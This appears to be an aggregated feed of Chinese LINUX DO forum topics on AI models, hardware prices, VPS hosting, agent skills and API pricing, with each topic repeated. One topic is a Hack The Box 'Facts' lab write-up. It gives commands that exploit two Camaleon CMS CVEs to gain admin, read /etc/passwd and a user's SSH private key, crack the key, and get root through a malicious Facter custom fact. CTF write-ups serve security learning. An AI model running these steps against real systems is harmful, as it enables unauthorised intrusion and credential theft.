誰吃了巧克力
題目 快去測測吧
本次參賽選手
2 posts - 2 participants
Read full topic
via LINUX DO - 最新话题 (author: 善解人意屬實有點害羞)
Invalid media:
image
image
image
題目 快去測測吧
本次參賽選手
2 posts - 2 participants
Read full topic
via LINUX DO - 最新话题 (author: 善解人意屬實有點害羞)
Invalid media:
image
image
image
HTB赛季机器 Facts wp
思路
app.hackthebox.com
Hack The Box
Nmap 扫出来 22 80 54321
80 是一个 web,改 host,域名打开,注册账号并登录
登录之后确定 cms 为 Camaleon CMS. Version 2.9.0
找历史漏洞,模板上传 rce 不行, MinIO 是兔子洞,没什么作用。
GitHub 找到一个 CVE-2025-2304 提权漏洞,可以把普通账号提为 admin
把自己提成 admin 之后,可以读到 MinIO 存储的 aksk,但是没用
补一句,这里可以把 admin 的密码改掉,但是意义并不大,我后面用的都是 admin,注意区分
接下来会用到 CVE-2024-46987 ,在官方通报中,这个漏洞在 2.8.0 至 < 2.8.2 可用,但是经实际测试,在 2.9.0 也可用
利用这个任意文件读取,读 passwd 获取用户名
拿到 id 为 1000 的用户名 trivia 1001 是 william
接着读 ssh 私钥(id_rsa、id_ed 25519、id_ecdsa)
读到之后,ssh 登录,但是 key 有密码用 ssh 2 john 存为 hash,再用 john 爆破,大概三分钟拿到密码。
Ssh 上去之后,在 william 目录拿到 key 1,sudo -l 找到免 passwd 命令 /usr/bin/facter
Facter 有一个 --custom-dir 参数,可以构造 RCE
提权至 root
懒得写长篇大论了,以后都只发思路
阅读原文
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: 慕鸢)
思路
app.hackthebox.com
Hack The Box
Nmap 扫出来 22 80 54321
80 是一个 web,改 host,域名打开,注册账号并登录
登录之后确定 cms 为 Camaleon CMS. Version 2.9.0
找历史漏洞,模板上传 rce 不行, MinIO 是兔子洞,没什么作用。
GitHub 找到一个 CVE-2025-2304 提权漏洞,可以把普通账号提为 admin
python exp.py http://facts.htb abc abc@123
把自己提成 admin 之后,可以读到 MinIO 存储的 aksk,但是没用
补一句,这里可以把 admin 的密码改掉,但是意义并不大,我后面用的都是 admin,注意区分
接下来会用到 CVE-2024-46987 ,在官方通报中,这个漏洞在 2.8.0 至 < 2.8.2 可用,但是经实际测试,在 2.9.0 也可用
利用这个任意文件读取,读 passwd 获取用户名
python3 CVE-2024-46987.py -u http://facts.htb/ -l admin -p abc@123 /etc/passwd
拿到 id 为 1000 的用户名 trivia 1001 是 william
接着读 ssh 私钥(id_rsa、id_ed 25519、id_ecdsa)
python3 CVE-2024-46987.py -u http://facts.htb/ -l admin -p abc@123 /home/trivia/.ssh/id_ed25519
读到之后,ssh 登录,但是 key 有密码用 ssh 2 john 存为 hash,再用 john 爆破,大概三分钟拿到密码。
Ssh 上去之后,在 william 目录拿到 key 1,sudo -l 找到免 passwd 命令 /usr/bin/facter
Facter 有一个 --custom-dir 参数,可以构造 RCE
mkdir -p /tmp/rfacts
cat > /tmp/rfacts/evil.rb << 'EOF'
Facter.add('evil') do
setcode do
system('/bin/bash')
end
end
EOF
提权至 root
sudo /usr/bin/facter --custom-dir /tmp/rfacts evil
懒得写长篇大论了,以后都只发思路
阅读原文
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: 慕鸢)
佬友有没有靠谱的ai测评榜单 截止目前日常提问gpt5.2是最强的嘛
刚刚刷到了视频说为了宣传 ai训练厂家会直接把 流行测评原题和答案训练进模型导致正确率虚高,如果拿几道没训练过的题就现原形。
会存在每家都说自己最好的现象。
有没有一个较为客观的榜单可以参考呢?
佬友们认为现在最强的自然语言大模型是哪个呢?
起因是本是一直是gpt的忠实用户(毕竟是最先做起来的模型 带一种滤镜) 最近实在觉得gpt5.2thinking有点不太适应了 问一个不懂的问题gpt现在说话我感觉晦涩难懂 能看出来好像回答问题被加了很多奇奇怪怪的限制
比如
先说结论
要不要我帮你
你的吐槽完全对
而且经常罗列分点
对我来说不如哈基米3pro的陈述自然易懂
所以想换一个主力大模型
但是gpt的比哈基米3pro强在于联网搜索 gpt的知识储备比哈基米3新
所以想找找有没有有没有更好的模型
然后又去搜了openruter lmarena hg这些模型榜单和一些测评视频众说纷纭
貌似现在最强的是claude opus4.6?
佬友们怎么看?(如果l站有个自测评榜单就好了)
4 posts - 4 participants
Read full topic
via LINUX DO - 最新话题 (author: Tearlaments)
刚刚刷到了视频说为了宣传 ai训练厂家会直接把 流行测评原题和答案训练进模型导致正确率虚高,如果拿几道没训练过的题就现原形。
会存在每家都说自己最好的现象。
有没有一个较为客观的榜单可以参考呢?
佬友们认为现在最强的自然语言大模型是哪个呢?
起因是本是一直是gpt的忠实用户(毕竟是最先做起来的模型 带一种滤镜) 最近实在觉得gpt5.2thinking有点不太适应了 问一个不懂的问题gpt现在说话我感觉晦涩难懂 能看出来好像回答问题被加了很多奇奇怪怪的限制
比如
先说结论
要不要我帮你
你的吐槽完全对
而且经常罗列分点
对我来说不如哈基米3pro的陈述自然易懂
所以想换一个主力大模型
但是gpt的比哈基米3pro强在于联网搜索 gpt的知识储备比哈基米3新
所以想找找有没有有没有更好的模型
然后又去搜了openruter lmarena hg这些模型榜单和一些测评视频众说纷纭
貌似现在最强的是claude opus4.6?
佬友们怎么看?(如果l站有个自测评榜单就好了)
4 posts - 4 participants
Read full topic
via LINUX DO - 最新话题 (author: Tearlaments)
webshare现在刷哪个段好一点?
刷了一天了 没刷到好的ip
4 posts - 3 participants
Read full topic
via LINUX DO - 最新话题 (author: s T)
刷了一天了 没刷到好的ip
4 posts - 3 participants
Read full topic
via LINUX DO - 最新话题 (author: s T)
内存条还会迎来之前的价格么,笔记本16G内存现在有点脆弱该怎么调教
最近笔记本的16g不太够用了,19年大学买的电脑,想扩容结果看到价格劝退,什么时候能回到平民价格呜呜呜 😭
笔记本打开几个软件,内存就要满了,怎么调教一下关掉不必要的后台,有没有佬友给出一些建议,应该不少人遇到这个,感谢分享
12 posts - 9 participants
Read full topic
via LINUX DO - 最新话题 (author: 乘支儿)
Invalid media:
image
image
最近笔记本的16g不太够用了,19年大学买的电脑,想扩容结果看到价格劝退,什么时候能回到平民价格呜呜呜 😭
笔记本打开几个软件,内存就要满了,怎么调教一下关掉不必要的后台,有没有佬友给出一些建议,应该不少人遇到这个,感谢分享
12 posts - 9 participants
Read full topic
via LINUX DO - 最新话题 (author: 乘支儿)
Invalid media:
image
image
和 openclaw 一起写了个 skill,让 AI 帮我做 Github 项目调研
github.com
GitHub - blessonism/github-explorer-skill: OpenClaw Agent Skill — 对任意 GitHub...
OpenClaw Agent Skill — 对任意 GitHub 项目进行多源深度分析,输出结构化研判报告
我只需要说一句"帮我看看 xxx 项目",它就会:
1. 自动定位 repo,抓 README、Stars、Forks 基础信息
2. 翻 Issues 找高质量讨论(按评论数排序,挑 maintainer 参与的、暴露架构问题的)
3. 去知乎、微信公众号、V2EX、Twitter 搜这个项目的推荐,反馈贴(L 站用无头浏览器进不来)
4. 查 arXiv 有没有关联论文,DeepWiki,zread 有没有收录
5. 找同赛道竞品做横向对比
6. 最后给出一份结构化报告,附带它自己的主观判断
整个过程大概 3-5 分钟,省下我至少半小时的调研时间
几个我觉得比较实用的设计点:
• 底层接了 Brave + Exa + Tavily 三个搜索引擎并行跑,一个挂了自动降级,不会因为某个 API 429 就整个卡住
• 知乎/微信公众号这种反爬站点有专门处理。web_fetch 抓不到的会自动切 MinerU 解析
• 社区讨论国内国外信源都会收集,收集的信息会直接引用具体的推文、帖子内容,附原始链接
• 最后会给出一个总结——这个项目适合谁、什么阶段、值不值得投入时间
如果你也在用 OpenClaw,可以直接装来试试,如果能给个 Star 就更好啦 😉
示例截图 (click for more details)
11 posts - 7 participants
Read full topic
via LINUX DO - 最新话题 (author: edom)
Invalid media: image
逛论坛还有 X 时经常刷到不错 Github 项目,很多时候想对这个项目进行进一步了解,但是受限于手机不是很方便,大部分时候的流程都是:
点开 README → 好长 → 翻到底 → 看 Stars 数 → 嗯还行 → 点个 star → 关掉,等以后用电脑再仔细看看
且不说大部分时候后面就忘记这回事了,就算记起来了想对这个 Github 项目有进一步了解需要耗费大量时间去各种渠道(官方网站,相关社区)搜集信息,刷使用指南,踩坑贴,短则十来分钟,长则半小时一小时不等。所以我让 openclaw 帮我写了一个 skill:Github-Explorer
github.com
GitHub - blessonism/github-explorer-skill: OpenClaw Agent Skill — 对任意 GitHub...
OpenClaw Agent Skill — 对任意 GitHub 项目进行多源深度分析,输出结构化研判报告
我只需要说一句"帮我看看 xxx 项目",它就会:
1. 自动定位 repo,抓 README、Stars、Forks 基础信息
2. 翻 Issues 找高质量讨论(按评论数排序,挑 maintainer 参与的、暴露架构问题的)
3. 去知乎、微信公众号、V2EX、Twitter 搜这个项目的推荐,反馈贴(L 站用无头浏览器进不来)
4. 查 arXiv 有没有关联论文,DeepWiki,zread 有没有收录
5. 找同赛道竞品做横向对比
6. 最后给出一份结构化报告,附带它自己的主观判断
整个过程大概 3-5 分钟,省下我至少半小时的调研时间
几个我觉得比较实用的设计点:
• 底层接了 Brave + Exa + Tavily 三个搜索引擎并行跑,一个挂了自动降级,不会因为某个 API 429 就整个卡住
• 知乎/微信公众号这种反爬站点有专门处理。web_fetch 抓不到的会自动切 MinerU 解析
• 社区讨论国内国外信源都会收集,收集的信息会直接引用具体的推文、帖子内容,附原始链接
• 最后会给出一个总结——这个项目适合谁、什么阶段、值不值得投入时间
如果你也在用 OpenClaw,可以直接装来试试,如果能给个 Star 就更好啦 😉
示例截图 (click for more details)
11 posts - 7 participants
Read full topic
via LINUX DO - 最新话题 (author: edom)
Invalid media: image
88code 到底还在国内吗?
88code 的客服倒是还挺快回消息的
但是只禁用不退钱?按理说上游都是账期的,C端都是预付的,这个钱应该是很充足的
不是很懂这是什么逻辑
5 posts - 5 participants
Read full topic
via LINUX DO - 最新话题 (author: heitaoZ)
Invalid media:
image
image
image
88code 的客服倒是还挺快回消息的
但是只禁用不退钱?按理说上游都是账期的,C端都是预付的,这个钱应该是很充足的
不是很懂这是什么逻辑
5 posts - 5 participants
Read full topic
via LINUX DO - 最新话题 (author: heitaoZ)
Invalid media:
image
image
image
glados问题
为什么我的全部超时了,重新导入也一样呢,
5 posts - 2 participants
Read full topic
via LINUX DO - 最新话题 (author: 胥渡)
Invalid media:
image
image
为什么我的全部超时了,重新导入也一样呢,
5 posts - 2 participants
Read full topic
via LINUX DO - 最新话题 (author: 胥渡)
Invalid media:
image
image
求推荐ipv6 only的 香港 hkix vps
直连校园网太爽了 wap家的卖完了 求推荐类似的
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: coding1)
直连校园网太爽了 wap家的卖完了 求推荐类似的
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: coding1)
【周回顾】基于AI的一周新闻分析(0201-0207)
新闻源:BBC NEWS 中文、FT中文网、法广RFI、36氪、虎嗅、爱范儿、少数派、人民日报、求是网等
由AI对一天的新闻进行汇总分析,一周后再由AI分析一周的新闻并给出报告
时间范围:2026-02-01 ~ 2026-02-07
所有资料已附在下面。
0201-0207.zip (75.9 KB)
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: Nightone)
Invalid media:
image
image
image
image
image
image
新闻源:BBC NEWS 中文、FT中文网、法广RFI、36氪、虎嗅、爱范儿、少数派、人民日报、求是网等
由AI对一天的新闻进行汇总分析,一周后再由AI分析一周的新闻并给出报告
时间范围:2026-02-01 ~ 2026-02-07
所有资料已附在下面。
0201-0207.zip (75.9 KB)
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: Nightone)
Invalid media:
image
image
image
image
image
image
用ai生成了个虚拟音乐人,求各位佬帮忙打call
分享tigerTT的单曲《Heart Says Yes》: Heart Says Yes - tigerTT - 单曲 - 网易云音乐 (来自@网易云音乐)
已上线网易云音乐,求各位佬友帮忙点个赞,觉得好听的话帮忙推广一下 😙
3 posts - 2 participants
Read full topic
via LINUX DO - 最新话题 (author: thr)
分享tigerTT的单曲《Heart Says Yes》: Heart Says Yes - tigerTT - 单曲 - 网易云音乐 (来自@网易云音乐)
已上线网易云音乐,求各位佬友帮忙点个赞,觉得好听的话帮忙推广一下 😙
3 posts - 2 participants
Read full topic
via LINUX DO - 最新话题 (author: thr)
上次哪个大佬有发的长久记忆的方案的?
每次和ai沟通讨论都非常长,导致上下文缺少了,那怎么实现长记忆呢?上次看到佬写了一个类似的,但是帖子没有了,或者有类似方案吗?
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: tomas07)
每次和ai沟通讨论都非常长,导致上下文缺少了,那怎么实现长记忆呢?上次看到佬写了一个类似的,但是帖子没有了,或者有类似方案吗?
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: tomas07)
使用4.6 opus做的小姐姐视频网页 + 源码
xjj.51hzouo.cn
XJJ - Video Feed
4.6真猛呀 3次对话就完成我的需求了,美美去看小姐姐
api来源:
https://linux.do/t/topic/1583188
附源代码 单html
index.html.zip (9.4 KB)
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: 51Hz)
xjj.51hzouo.cn
XJJ - Video Feed
4.6真猛呀 3次对话就完成我的需求了,美美去看小姐姐
api来源:
https://linux.do/t/topic/1583188
附源代码 单html
index.html.zip (9.4 KB)
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: 51Hz)
千问能不能买药
吐槽下千问太难用了,正常下单千问一直回复人多,用佬友发的减免了空子,成功减免,闪购提交永远繁忙,千问能看到买药减免下单却是原件
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: tao)
吐槽下千问太难用了,正常下单千问一直回复人多,用佬友发的减免了空子,成功减免,闪购提交永远繁忙,千问能看到买药减免下单却是原件
1 post - 1 participant
Read full topic
via LINUX DO - 最新话题 (author: tao)
那些登录要平台手机号验证的谷歌账号,请你隔段时间就去试试
我有两个谷歌账号,几个月前要求重新登录,且要求用注册时候的手机接收验证码,当初用的平台手机号,根本没办了。
这两个号绑定了国外edu邮箱转发,我坚持隔一段时间去登录一次,经过十几次登录尝试,这两天告诉我账号和其他账号有关联被暂封,申述后可以登录了,不再要求注册手机号接码了。虽然pro会员没了,可是账号回来了
3 posts - 3 participants
Read full topic
via LINUX DO - 最新话题 (author: edawrz)
我有两个谷歌账号,几个月前要求重新登录,且要求用注册时候的手机接收验证码,当初用的平台手机号,根本没办了。
这两个号绑定了国外edu邮箱转发,我坚持隔一段时间去登录一次,经过十几次登录尝试,这两天告诉我账号和其他账号有关联被暂封,申述后可以登录了,不再要求注册手机号接码了。虽然pro会员没了,可是账号回来了
3 posts - 3 participants
Read full topic
via LINUX DO - 最新话题 (author: edawrz)
【水】整理了部分大模型的官方API价格(更新日期:2026-02-08)
罗列部分大模型的价格供参考
国内大模型
更新时间:2026-02-08
(单位统一为元/1M Tokens)
百度 (Baidu)
阿里云 (Aliyun)
智谱AI (ZhipuAI)
DeepSeek
火山引擎 (Volcengine)
MiniMax
月之暗面 (Moonshot AI)
国外大模型
更新时间:2026-02-08
(单位统一为美元/1M Tokens)
OpenAI
Anthropic (Claude)
Google (Gemini)
5 posts - 4 participants
Read full topic
via LINUX DO - 最新话题 (author: 弦塔_)
罗列部分大模型的价格供参考
国内大模型
更新时间:2026-02-08
(单位统一为元/1M Tokens)
百度 (Baidu)
数据来源:百度智能云千帆大模型平台
阿里云 (Aliyun)
数据来源:阿里云百炼模型价格 | 上下文缓存说明
智谱AI (ZhipuAI)
数据来源:智谱AI开放平台
DeepSeek
数据来源:DeepSeek API Docs
火山引擎 (Volcengine)
数据来源:火山方舟大模型服务平台
MiniMax
数据来源:MiniMax 开放平台
月之暗面 (Moonshot AI)
数据来源:Moonshot AI 开放平台
国外大模型
更新时间:2026-02-08
(单位统一为美元/1M Tokens)
OpenAI
数据来源:OpenAI Pricing (Standard)
Anthropic (Claude)
数据来源:Claude Pricing
Google (Gemini)
数据来源:Gemini API Pricing
5 posts - 4 participants
Read full topic
via LINUX DO - 最新话题 (author: 弦塔_)
【快讯(?)】华为发布CodeArts代码智能体
huaweicloud.com
CodeArts代码智能体_懂你的编码专家-华为云
一个理解项目需求,懂得编码之道,善用百器的实干派AI研发专家,开启你的编码自动驾驶模式
华为发布CodeArts代码智能体,似乎免费喵?
刚刚收到的短信喵,说是可以用glm4.7?w
9 posts - 8 participants
Read full topic
via LINUX DO - 最新话题 (author: 兰兰)
Invalid media: image
huaweicloud.com
CodeArts代码智能体_懂你的编码专家-华为云
一个理解项目需求,懂得编码之道,善用百器的实干派AI研发专家,开启你的编码自动驾驶模式
华为发布CodeArts代码智能体,似乎免费喵?
刚刚收到的短信喵,说是可以用glm4.7?w
9 posts - 8 participants
Read full topic
via LINUX DO - 最新话题 (author: 兰兰)
Invalid media: image
感谢wong站大佬,顺便小秀一下
穷人,全靠站内大佬的公益,看到wong站大佬年前最后一次放水,《【WONG公益站】年前最后一次发兑换码》https://linux.do/t/topic/1583548
迫不及待的等候…终于
虽然不是最高的88,但也应该够用了,感谢大佬
11 posts - 11 participants
Read full topic
via LINUX DO - 最新话题 (author: zbigbird)
Invalid media: image
穷人,全靠站内大佬的公益,看到wong站大佬年前最后一次放水,《【WONG公益站】年前最后一次发兑换码》https://linux.do/t/topic/1583548
迫不及待的等候…终于
虽然不是最高的88,但也应该够用了,感谢大佬
11 posts - 11 participants
Read full topic
via LINUX DO - 最新话题 (author: zbigbird)
Invalid media: image
无聊的Whois查询
做了个自己维护和使用也提供接口,目前支持1400+域名,也支持rdap,因为ipv4与ipv6与asn用不到所以就没上。
上了子域名查询,可以查到部分子域名。
域名查询工具
域名查询工具 - Whois & RDAP
专业的域名查询工具,支持 Whois 和 RDAP 双重查询,快速获取域名详细信息。
确实挺无聊的
不得不说ai真强大
3 posts - 3 participants
Read full topic
via LINUX DO - 最新话题 (author: 喃喃喃)
Invalid media:
image
animation
做了个自己维护和使用也提供接口,目前支持1400+域名,也支持rdap,因为ipv4与ipv6与asn用不到所以就没上。
上了子域名查询,可以查到部分子域名。
域名查询工具
域名查询工具 - Whois & RDAP
专业的域名查询工具,支持 Whois 和 RDAP 双重查询,快速获取域名详细信息。
确实挺无聊的
不得不说ai真强大
3 posts - 3 participants
Read full topic
via LINUX DO - 最新话题 (author: 喃喃喃)
Invalid media:
image
animation